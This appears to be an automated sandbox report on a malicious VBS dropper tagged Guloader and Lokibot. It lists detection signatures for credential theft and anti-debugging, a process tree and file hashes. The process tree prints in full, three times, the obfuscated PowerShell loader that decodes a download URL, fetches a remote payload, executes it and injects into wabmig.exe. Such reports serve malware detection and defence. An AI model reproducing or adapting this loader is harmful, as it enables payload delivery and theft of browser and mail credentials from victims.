Analysis
-
max time kernel
146s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
22-09-2024 05:18
General
-
Target
EX778415591042.vbs
-
Size
10KB
-
MD5
e54e9c9586d6eb1b032b97f5ced77204
-
SHA1
d4ef79ae803dc0cbca9e180d9cf88cce6e8d08d7
-
SHA256
c7cc1d7877c14667c21c56547ad84a8cd7d8def57789911a559d2a28399ae43b
-
SHA512
7030de2b60b1cdb73bde04d83824de14c434828e050ba92e4d55a7f757453fb2567feed781cb6320b10cded7cb6630627540c2f8b8f941ce0ec039f539fd7400
-
SSDEEP
192:PxDz2esQhSJLqvYLHHCsm1Bls6Vz06Clv5eVQzN8bzUik4JO7qI7m+:JJtSqqnHGDNCv5RzN8bzUiDJel1
Score
10/10
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Blocklisted process makes network request 2 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of WriteProcessMemory 17 IoCs
-
outlook_office_path 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\EX778415591042.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Tekstbehandlingskodernes Postheat Annotering Perameles Ekskommunikeret Hortative #>;$Reflows224='Korporaler';<#Overprune smrboksenes Campisterne Teia Arguses Brakkedes #>;$solbrsaft=$host.PrivateData;If ($solbrsaft) {$Titulatur++;}function Indlevere($Zonelovstilladelser){$Decancellate=$Zonelovstilladelser.Length-$Titulatur;for( $pallers=3;$pallers -lt $Decancellate;$pallers+=4){$subbifid+=$Zonelovstilladelser[$pallers];}$subbifid;}function overtrims($Dispensate){ . ($spondylosyndesis) ($Dispensate);}$slapshot=Indlevere 'In MAnaoUndzApii d,lco l GoaDe./.tt5Gra.For0Rea or(M.tWDomiF.rndord.bsoDzuwN nsAud Di N ovT e Raa1 sn0ska.A,l0O.e;Dde HetWs.niungnRem6 s 4 u; Af Melx.ab6Met4.er;Non orGodvBov:pa 1Cu,2B,g1Bun.Bru0 n)Pis .onGsigeMetcEntkTitoo c/For2.du0Kra1Dac0Pud0ste1Int0R,t1Per BreFMagi terB aeForfJagobarxMis/Coc1F.e2spl1art.Ano0But ';$Cicoree=Indlevere 'GroUH lsBuoEdi.r Is-Arta CuGCabeBr Nt ltBi ';$Narcaciontes=Indlevere 's uhB st.vetsucp ,es ej:Bev/Bev/ s d .lr A.iAfsv steTyn.Basg sto UnoProgbaslF,beBr..d.sc UnoF rmV n/ egus icFri? OreA oxTrap EsoAskr,pktHea= Asd.rioDaawpacn HylsoloEfta Ovd el& ani ksd,en=Pt.1Ko cb.kQMat8FafosatG kauAlaw TayBeddf,nxHundC ma .kqs,iaand1Lon5sch6se,lHieQant7Cou8Udk5 KoBsysTRbeHTyrBNyhTDyklOvei InnAt,6sapQR e ';$Physiotherapies=Indlevere 'Fje>rep ';$spondylosyndesis=Indlevere 'B nIstrE R,X m ';$Hemitropy='Atmidalbumin';$Wykehamical = Indlevere 'DiseAssc UnhMu,oEta Fol% ,laUnrpst p stdPeraDe t Gnasig%Red\OkkJOx eWoruNi nDisegensKn.sBe eR s.Um.s sclKaruCr, Pro&Exo&,yp Om.estrcBeshBeno Ha Dagtson ';overtrims (Indlevere 'Aar$Uo g Afl OvoErnb ia .gl sr:BekPOrahskri B lVeroP nsun o ropsluhNyseK ad Gooa,smInt=spe(AircM nmRevd Po Chu/sclc r Bes$HouWIntyFerkCa eDilhDa,aFr mReciM sc Cua ulgdn)Co ');overtrims (Indlevere '.eg$Ging DelFo,oLicb etaE llOpi: ndlTemasy.g.ildRegeP.slsagi U nRoagAane onBlo=P r$sk NOu.as ir,rac.ebascac LaiUndo s,nIn.t sme FisEst.Pars UrpTeklTegiHyptFor(,ed$Es Pmerh Fay resPi.i FroGustTelhVerePrerLdras,npAsci,ncerefs ,n)Oph ');overtrims (Indlevere ' ,a[ rNKlae satBve.ForssaneHamrskrv Doi icPereaboP DeoCe.iBlgnEttt jMOk astenDe astagKlae VorKam]B,r:sni:C,lsPlae arca ku MorV liWestUnvy TiP anrAd oHartMetoToscBreoFasl Mo ty=s.b Ker[ U N Gre ,utTri. C,sKome esc HouHo rs.riOvetPe yEr PHaer FooBrat Unosnyc MaoRe l TiT .ry rp veeArt]ste:sta:Hi.TQuilDi sFa 1Red2Inf ');$Narcaciontes=$lagdelingen[0];$stilarterne= (Indlevere '.ar$FreGU,mLIdeOBorbDisaPr L In:TriIGenNM.tsUnbTRe A pinsemtsulLFluY,ry= ViNC tEEf wNon-preoAanBRepJBryePo cbagTMut Tals InYU as ActMeseNigm aa. E nAutEHy TFus. epWVaneMa.b.alcAntlAutIsupe .en lt');$stilarterne+=$Philosophedom[1];overtrims ($stilarterne);overtrims (Indlevere ' na$LytIDisnBnds ottOvea UnnGastcy,lUtrys.u.OveHspeeK.baTridUdseMonri.tsVar[ C.$ReaCKreiRe,cHomoAvirD.meEikesub]sol=Inf$ pis,trlTraamagpEl s lhUnho rytOui ');$Gallinae=Indlevere ' nt$ kuIPedn knsLystUnia,bdn ortEutlHelyPas. TiDkaroProwskunMaylFyloUdeaAt,dsc FU diRubl weV n(sub$ I Nstra BrrTvic apaIntc R iInkoswonimptUnde NosDec,Bli$PinMEariKrosUnrsskuiB ro TrnJuxe I rU,iesystC i)se, ';$Missioneret=$Philosophedom[0];overtrims (Indlevere ' Ba$RinGWealDefoH,vb esaMicLPar:He,sVe U A,Pel ps eeDdsT efeReirRedrRe I F NMikeDubnFam=Vlg(Unwt.oeeAuksOveT A.-D,gpTheaTaltFitHKom End$.utMMorIViks TrsLinI CaOGalNNa EstdrBukEvekt d)syn ');while (!$suppeterrinen) {overtrims (Indlevere ' ho$G,ugGrolC co Teb O a,nsl he:.ngAM lsEm ssanuMismG.le canLret Aa= De$Lept.trr,dsuChie,om ') ;overtrims $Gallinae;overtrims (Indlevere 'Mi s yst deaOv.rJa tMo,-netsKlilLeveW leHe pBrd Gen4Fur ');overtrims (Indlevere 'Men$ Vog TrlsteoHedb MeaNonlBea:WansDi uDefpOutpFeteKontB seLavrtftrFi,i MynBu estrn sk=Pr (TemT PaeEpisMictInd-PoeP veaT rt Lehsol M t$hovM Geiseps.onsAnni MooJayn eeBssr .heDirtBra) ia ') ;overtrims (Indlevere ' Dr$CatgTnkl vaoRumbDefaMonlH,i:N lAC nv GrlPadeDr,dBioy MegbratPhriIs gsmehT reOvedMole Kon Ba2Inf0 Tr9Ou = tr$QuagEjelKoroModb,itaRaplRaj:BitT rueTellPrrf CyoHemnRekm Zio Nonpart AsrManestir DinB,me.ip+ v+ a% .r$U,clTitasy g UddUndespulTeriPronOveg F e lonF x. OpcRegoVanud.enKa tPai ') ;$Narcaciontes=$lagdelingen[$Avledygtigheden209];}$sknserklringen=314125;$Peninsulas=28276;overtrims (Indlevere ' ui$.negD,ml meo orbspia,allsil:forsmisaNitu sarsamoAtrpHalo H.dBowa .u r=sej poiGUske B tBut- ReCbafo T.ntrat B eTjanR et nk H,l$Ce,Mtitistass ls Lui Reoev nTr.e orrChreTratTy. ');overtrims (Indlevere ' No$ Fag D.lVi oDucbJg aRepl Br: AnJp,eu stnLedi skoArmrA gcAlbhPlae .kf,ite InrTr Ko = s, P a[FeasFluyHo sComtIldeThomInd.ProC U o synRe,vAmpeF grHaltsfr]rig: oc:HatF E.r JooFllmpatB A,aF.ssevie,al6Pas4Ad,ss.yt Virudyi .nn apgApr(s.d$op.sPola ausavrA moTakpskioNeddAtta s )Ove ');overtrims (Indlevere 'eks$OrdgWidl co Hob igaPralHi.:KomE ResPleoE snNo aunrrGrit suhmueesolxO.h v=spa Mer[sstsIncyskrs ErtLg eDr.mAfs.smaTProe,ilxDkstAnt.EksEstunUndcGruoGo dTigiDatncelgM t]Zon:sta:HomA asUngC ViIM nIE s.Un GAreeBuntfresJ ctEl r aiiCosnMicg.ib(Pro$MavJPreu BrnAuti D o FirToucPr.hOmneAdhf teeFlarKre)Dis ');overtrims (Indlevere 'Udt$GaagUtvlRaso hbskraTeulBak:OslNReaoA,fnMasl GeeLoggDesaQuat rtoVeg=so.$ DiE s sWaso tonRdkaIagr sut lh Mae alxs c. ,nsPr,uHerb Las,dit Awr oli A n DigNos( .e$Ulns.pek pnVinsCareCh rsigkTanlstersueiImmnuskgTi,estinRen, Mi$ ToP ete Ren .niEspnDats G,uFesls.raRevs sh)Pig ');overtrims $Nonlegato;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Jeunesse.slu && echo t"3⤵
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Tekstbehandlingskodernes Postheat Annotering Perameles Ekskommunikeret Hortative #>;$Reflows224='Korporaler';<#Overprune smrboksenes Campisterne Teia Arguses Brakkedes #>;$solbrsaft=$host.PrivateData;If ($solbrsaft) {$Titulatur++;}function Indlevere($Zonelovstilladelser){$Decancellate=$Zonelovstilladelser.Length-$Titulatur;for( $pallers=3;$pallers -lt $Decancellate;$pallers+=4){$subbifid+=$Zonelovstilladelser[$pallers];}$subbifid;}function overtrims($Dispensate){ . ($spondylosyndesis) ($Dispensate);}$slapshot=Indlevere 'In MAnaoUndzApii d,lco l GoaDe./.tt5Gra.For0Rea or(M.tWDomiF.rndord.bsoDzuwN nsAud Di N ovT e Raa1 sn0ska.A,l0O.e;Dde HetWs.niungnRem6 s 4 u; Af Melx.ab6Met4.er;Non orGodvBov:pa 1Cu,2B,g1Bun.Bru0 n)Pis .onGsigeMetcEntkTitoo c/For2.du0Kra1Dac0Pud0ste1Int0R,t1Per BreFMagi terB aeForfJagobarxMis/Coc1F.e2spl1art.Ano0But ';$Cicoree=Indlevere 'GroUH lsBuoEdi.r Is-Arta CuGCabeBr Nt ltBi ';$Narcaciontes=Indlevere 's uhB st.vetsucp ,es ej:Bev/Bev/ s d .lr A.iAfsv steTyn.Basg sto UnoProgbaslF,beBr..d.sc UnoF rmV n/ egus icFri? OreA oxTrap EsoAskr,pktHea= Asd.rioDaawpacn HylsoloEfta Ovd el& ani ksd,en=Pt.1Ko cb.kQMat8FafosatG kauAlaw TayBeddf,nxHundC ma .kqs,iaand1Lon5sch6se,lHieQant7Cou8Udk5 KoBsysTRbeHTyrBNyhTDyklOvei InnAt,6sapQR e ';$Physiotherapies=Indlevere 'Fje>rep ';$spondylosyndesis=Indlevere 'B nIstrE R,X m ';$Hemitropy='Atmidalbumin';$Wykehamical = Indlevere 'DiseAssc UnhMu,oEta Fol% ,laUnrpst p stdPeraDe t Gnasig%Red\OkkJOx eWoruNi nDisegensKn.sBe eR s.Um.s sclKaruCr, Pro&Exo&,yp Om.estrcBeshBeno Ha Dagtson ';overtrims (Indlevere 'Aar$Uo g Afl OvoErnb ia .gl sr:BekPOrahskri B lVeroP nsun o ropsluhNyseK ad Gooa,smInt=spe(AircM nmRevd Po Chu/sclc r Bes$HouWIntyFerkCa eDilhDa,aFr mReciM sc Cua ulgdn)Co ');overtrims (Indlevere '.eg$Ging DelFo,oLicb etaE llOpi: ndlTemasy.g.ildRegeP.slsagi U nRoagAane onBlo=P r$sk NOu.as ir,rac.ebascac LaiUndo s,nIn.t sme FisEst.Pars UrpTeklTegiHyptFor(,ed$Es Pmerh Fay resPi.i FroGustTelhVerePrerLdras,npAsci,ncerefs ,n)Oph ');overtrims (Indlevere ' ,a[ rNKlae satBve.ForssaneHamrskrv Doi icPereaboP DeoCe.iBlgnEttt jMOk astenDe astagKlae VorKam]B,r:sni:C,lsPlae arca ku MorV liWestUnvy TiP anrAd oHartMetoToscBreoFasl Mo ty=s.b Ker[ U N Gre ,utTri. C,sKome esc HouHo rs.riOvetPe yEr PHaer FooBrat Unosnyc MaoRe l TiT .ry rp veeArt]ste:sta:Hi.TQuilDi sFa 1Red2Inf ');$Narcaciontes=$lagdelingen[0];$stilarterne= (Indlevere '.ar$FreGU,mLIdeOBorbDisaPr L In:TriIGenNM.tsUnbTRe A pinsemtsulLFluY,ry= ViNC tEEf wNon-preoAanBRepJBryePo cbagTMut Tals InYU as ActMeseNigm aa. E nAutEHy TFus. epWVaneMa.b.alcAntlAutIsupe .en lt');$stilarterne+=$Philosophedom[1];overtrims ($stilarterne);overtrims (Indlevere ' na$LytIDisnBnds ottOvea UnnGastcy,lUtrys.u.OveHspeeK.baTridUdseMonri.tsVar[ C.$ReaCKreiRe,cHomoAvirD.meEikesub]sol=Inf$ pis,trlTraamagpEl s lhUnho rytOui ');$Gallinae=Indlevere ' nt$ kuIPedn knsLystUnia,bdn ortEutlHelyPas. TiDkaroProwskunMaylFyloUdeaAt,dsc FU diRubl weV n(sub$ I Nstra BrrTvic apaIntc R iInkoswonimptUnde NosDec,Bli$PinMEariKrosUnrsskuiB ro TrnJuxe I rU,iesystC i)se, ';$Missioneret=$Philosophedom[0];overtrims (Indlevere ' Ba$RinGWealDefoH,vb esaMicLPar:He,sVe U A,Pel ps eeDdsT efeReirRedrRe I F NMikeDubnFam=Vlg(Unwt.oeeAuksOveT A.-D,gpTheaTaltFitHKom End$.utMMorIViks TrsLinI CaOGalNNa EstdrBukEvekt d)syn ');while (!$suppeterrinen) {overtrims (Indlevere ' ho$G,ugGrolC co Teb O a,nsl he:.ngAM lsEm ssanuMismG.le canLret Aa= De$Lept.trr,dsuChie,om ') ;overtrims $Gallinae;overtrims (Indlevere 'Mi s yst deaOv.rJa tMo,-netsKlilLeveW leHe pBrd Gen4Fur ');overtrims (Indlevere 'Men$ Vog TrlsteoHedb MeaNonlBea:WansDi uDefpOutpFeteKontB seLavrtftrFi,i MynBu estrn sk=Pr (TemT PaeEpisMictInd-PoeP veaT rt Lehsol M t$hovM Geiseps.onsAnni MooJayn eeBssr .heDirtBra) ia ') ;overtrims (Indlevere ' Dr$CatgTnkl vaoRumbDefaMonlH,i:N lAC nv GrlPadeDr,dBioy MegbratPhriIs gsmehT reOvedMole Kon Ba2Inf0 Tr9Ou = tr$QuagEjelKoroModb,itaRaplRaj:BitT rueTellPrrf CyoHemnRekm Zio Nonpart AsrManestir DinB,me.ip+ v+ a% .r$U,clTitasy g UddUndespulTeriPronOveg F e lonF x. OpcRegoVanud.enKa tPai ') ;$Narcaciontes=$lagdelingen[$Avledygtigheden209];}$sknserklringen=314125;$Peninsulas=28276;overtrims (Indlevere ' ui$.negD,ml meo orbspia,allsil:forsmisaNitu sarsamoAtrpHalo H.dBowa .u r=sej poiGUske B tBut- ReCbafo T.ntrat B eTjanR et nk H,l$Ce,Mtitistass ls Lui Reoev nTr.e orrChreTratTy. ');overtrims (Indlevere ' No$ Fag D.lVi oDucbJg aRepl Br: AnJp,eu stnLedi skoArmrA gcAlbhPlae .kf,ite InrTr Ko = s, P a[FeasFluyHo sComtIldeThomInd.ProC U o synRe,vAmpeF grHaltsfr]rig: oc:HatF E.r JooFllmpatB A,aF.ssevie,al6Pas4Ad,ss.yt Virudyi .nn apgApr(s.d$op.sPola ausavrA moTakpskioNeddAtta s )Ove ');overtrims (Indlevere 'eks$OrdgWidl co Hob igaPralHi.:KomE ResPleoE snNo aunrrGrit suhmueesolxO.h v=spa Mer[sstsIncyskrs ErtLg eDr.mAfs.smaTProe,ilxDkstAnt.EksEstunUndcGruoGo dTigiDatncelgM t]Zon:sta:HomA asUngC ViIM nIE s.Un GAreeBuntfresJ ctEl r aiiCosnMicg.ib(Pro$MavJPreu BrnAuti D o FirToucPr.hOmneAdhf teeFlarKre)Dis ');overtrims (Indlevere 'Udt$GaagUtvlRaso hbskraTeulBak:OslNReaoA,fnMasl GeeLoggDesaQuat rtoVeg=so.$ DiE s sWaso tonRdkaIagr sut lh Mae alxs c. ,nsPr,uHerb Las,dit Awr oli A n DigNos( .e$Ulns.pek pnVinsCareCh rsigkTanlstersueiImmnuskgTi,estinRen, Mi$ ToP ete Ren .niEspnDats G,uFesls.raRevs sh)Pig ');overtrims $Nonlegato;"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Tekstbehandlingskodernes Postheat Annotering Perameles Ekskommunikeret Hortative #>;$Reflows224='Korporaler';<#Overprune smrboksenes Campisterne Teia Arguses Brakkedes #>;$solbrsaft=$host.PrivateData;If ($solbrsaft) {$Titulatur++;}function Indlevere($Zonelovstilladelser){$Decancellate=$Zonelovstilladelser.Length-$Titulatur;for( $pallers=3;$pallers -lt $Decancellate;$pallers+=4){$subbifid+=$Zonelovstilladelser[$pallers];}$subbifid;}function overtrims($Dispensate){ . ($spondylosyndesis) ($Dispensate);}$slapshot=Indlevere 'In MAnaoUndzApii d,lco l GoaDe./.tt5Gra.For0Rea or(M.tWDomiF.rndord.bsoDzuwN nsAud Di N ovT e Raa1 sn0ska.A,l0O.e;Dde HetWs.niungnRem6 s 4 u; Af Melx.ab6Met4.er;Non orGodvBov:pa 1Cu,2B,g1Bun.Bru0 n)Pis .onGsigeMetcEntkTitoo c/For2.du0Kra1Dac0Pud0ste1Int0R,t1Per BreFMagi terB aeForfJagobarxMis/Coc1F.e2spl1art.Ano0But ';$Cicoree=Indlevere 'GroUH lsBuoEdi.r Is-Arta CuGCabeBr Nt ltBi ';$Narcaciontes=Indlevere 's uhB st.vetsucp ,es ej:Bev/Bev/ s d .lr A.iAfsv steTyn.Basg sto UnoProgbaslF,beBr..d.sc UnoF rmV n/ egus icFri? OreA oxTrap EsoAskr,pktHea= Asd.rioDaawpacn HylsoloEfta Ovd el& ani ksd,en=Pt.1Ko cb.kQMat8FafosatG kauAlaw TayBeddf,nxHundC ma .kqs,iaand1Lon5sch6se,lHieQant7Cou8Udk5 KoBsysTRbeHTyrBNyhTDyklOvei InnAt,6sapQR e ';$Physiotherapies=Indlevere 'Fje>rep ';$spondylosyndesis=Indlevere 'B nIstrE R,X m ';$Hemitropy='Atmidalbumin';$Wykehamical = Indlevere 'DiseAssc UnhMu,oEta Fol% ,laUnrpst p stdPeraDe t Gnasig%Red\OkkJOx eWoruNi nDisegensKn.sBe eR s.Um.s sclKaruCr, Pro&Exo&,yp Om.estrcBeshBeno Ha Dagtson ';overtrims (Indlevere 'Aar$Uo g Afl OvoErnb ia .gl sr:BekPOrahskri B lVeroP nsun o ropsluhNyseK ad Gooa,smInt=spe(AircM nmRevd Po Chu/sclc r Bes$HouWIntyFerkCa eDilhDa,aFr mReciM sc Cua ulgdn)Co ');overtrims (Indlevere '.eg$Ging DelFo,oLicb etaE llOpi: ndlTemasy.g.ildRegeP.slsagi U nRoagAane onBlo=P r$sk NOu.as ir,rac.ebascac LaiUndo s,nIn.t sme FisEst.Pars UrpTeklTegiHyptFor(,ed$Es Pmerh Fay resPi.i FroGustTelhVerePrerLdras,npAsci,ncerefs ,n)Oph ');overtrims (Indlevere ' ,a[ rNKlae satBve.ForssaneHamrskrv Doi icPereaboP DeoCe.iBlgnEttt jMOk astenDe astagKlae VorKam]B,r:sni:C,lsPlae arca ku MorV liWestUnvy TiP anrAd oHartMetoToscBreoFasl Mo ty=s.b Ker[ U N Gre ,utTri. C,sKome esc HouHo rs.riOvetPe yEr PHaer FooBrat Unosnyc MaoRe l TiT .ry rp veeArt]ste:sta:Hi.TQuilDi sFa 1Red2Inf ');$Narcaciontes=$lagdelingen[0];$stilarterne= (Indlevere '.ar$FreGU,mLIdeOBorbDisaPr L In:TriIGenNM.tsUnbTRe A pinsemtsulLFluY,ry= ViNC tEEf wNon-preoAanBRepJBryePo cbagTMut Tals InYU as ActMeseNigm aa. E nAutEHy TFus. epWVaneMa.b.alcAntlAutIsupe .en lt');$stilarterne+=$Philosophedom[1];overtrims ($stilarterne);overtrims (Indlevere ' na$LytIDisnBnds ottOvea UnnGastcy,lUtrys.u.OveHspeeK.baTridUdseMonri.tsVar[ C.$ReaCKreiRe,cHomoAvirD.meEikesub]sol=Inf$ pis,trlTraamagpEl s lhUnho rytOui ');$Gallinae=Indlevere ' nt$ kuIPedn knsLystUnia,bdn ortEutlHelyPas. TiDkaroProwskunMaylFyloUdeaAt,dsc FU diRubl weV n(sub$ I Nstra BrrTvic apaIntc R iInkoswonimptUnde NosDec,Bli$PinMEariKrosUnrsskuiB ro TrnJuxe I rU,iesystC i)se, ';$Missioneret=$Philosophedom[0];overtrims (Indlevere ' Ba$RinGWealDefoH,vb esaMicLPar:He,sVe U A,Pel ps eeDdsT efeReirRedrRe I F NMikeDubnFam=Vlg(Unwt.oeeAuksOveT A.-D,gpTheaTaltFitHKom End$.utMMorIViks TrsLinI CaOGalNNa EstdrBukEvekt d)syn ');while (!$suppeterrinen) {overtrims (Indlevere ' ho$G,ugGrolC co Teb O a,nsl he:.ngAM lsEm ssanuMismG.le canLret Aa= De$Lept.trr,dsuChie,om ') ;overtrims $Gallinae;overtrims (Indlevere 'Mi s yst deaOv.rJa tMo,-netsKlilLeveW leHe pBrd Gen4Fur ');overtrims (Indlevere 'Men$ Vog TrlsteoHedb MeaNonlBea:WansDi uDefpOutpFeteKontB seLavrtftrFi,i MynBu estrn sk=Pr (TemT PaeEpisMictInd-PoeP veaT rt Lehsol M t$hovM Geiseps.onsAnni MooJayn eeBssr .heDirtBra) ia ') ;overtrims (Indlevere ' Dr$CatgTnkl vaoRumbDefaMonlH,i:N lAC nv GrlPadeDr,dBioy MegbratPhriIs gsmehT reOvedMole Kon Ba2Inf0 Tr9Ou = tr$QuagEjelKoroModb,itaRaplRaj:BitT rueTellPrrf CyoHemnRekm Zio Nonpart AsrManestir DinB,me.ip+ v+ a% .r$U,clTitasy g UddUndespulTeriPronOveg F e lonF x. OpcRegoVanud.enKa tPai ') ;$Narcaciontes=$lagdelingen[$Avledygtigheden209];}$sknserklringen=314125;$Peninsulas=28276;overtrims (Indlevere ' ui$.negD,ml meo orbspia,allsil:forsmisaNitu sarsamoAtrpHalo H.dBowa .u r=sej poiGUske B tBut- ReCbafo T.ntrat B eTjanR et nk H,l$Ce,Mtitistass ls Lui Reoev nTr.e orrChreTratTy. ');overtrims (Indlevere ' No$ Fag D.lVi oDucbJg aRepl Br: AnJp,eu stnLedi skoArmrA gcAlbhPlae .kf,ite InrTr Ko = s, P a[FeasFluyHo sComtIldeThomInd.ProC U o synRe,vAmpeF grHaltsfr]rig: oc:HatF E.r JooFllmpatB A,aF.ssevie,al6Pas4Ad,ss.yt Virudyi .nn apgApr(s.d$op.sPola ausavrA moTakpskioNeddAtta s )Ove ');overtrims (Indlevere 'eks$OrdgWidl co Hob igaPralHi.:KomE ResPleoE snNo aunrrGrit suhmueesolxO.h v=spa Mer[sstsIncyskrs ErtLg eDr.mAfs.smaTProe,ilxDkstAnt.EksEstunUndcGruoGo dTigiDatncelgM t]Zon:sta:HomA asUngC ViIM nIE s.Un GAreeBuntfresJ ctEl r aiiCosnMicg.ib(Pro$MavJPreu BrnAuti D o FirToucPr.hOmneAdhf teeFlarKre)Dis ');overtrims (Indlevere 'Udt$GaagUtvlRaso hbskraTeulBak:OslNReaoA,fnMasl GeeLoggDesaQuat rtoVeg=so.$ DiE s sWaso tonRdkaIagr sut lh Mae alxs c. ,nsPr,uHerb Las,dit Awr oli A n DigNos( .e$Ulns.pek pnVinsCareCh rsigkTanlstersueiImmnuskgTi,estinRen, Mi$ ToP ete Ren .niEspnDats G,uFesls.raRevs sh)Pig ');overtrims $Nonlegato;"4⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Jeunesse.slu && echo t"5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Program Files (x86)\windows mail\wabmig.exe"C:\Program Files (x86)\windows mail\wabmig.exe"5⤵
- Accesses Microsoft Outlook profiles
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
445KB
MD58383998e368af99410a50d584700e574
SHA1e4649baea84eb0e2447b3baa92e26679f006fd1d
SHA256973f06e73b2965628d563d835b5e2b099f159c0ff3f1f1e139aa514b1bcefde1
SHA512bc8de24ef4f920c49b0af99114eba2d7741c9d355c2f732e8bcb593b11d98d3989fa4990985691b3efee430b3df43f1fbf3f4c7d361883b5440af532c092968a
-
Filesize
46B
MD5c07225d4e7d01d31042965f048728a0a
SHA169d70b340fd9f44c89adb9a2278df84faa9906b7
SHA2568c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA51223d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b
-
Filesize
46B
MD5d898504a722bff1524134c6ab6a5eaa5
SHA1e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA51226a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61
-
Filesize
6.2MB
-
Filesize
104KB
-
Filesize
216KB
-
Filesize
62.8MB
-
Filesize
136KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
3.3MB
-
Filesize
5.6MB
-
Filesize
120KB
-
Filesize
304KB
-
Filesize
136KB
-
Filesize
6.5MB
-
Filesize
600KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
8KB
-
Filesize
10.8MB
-
Filesize
8KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
62.8MB
-
Filesize
1.9MB
-
Filesize
62.8MB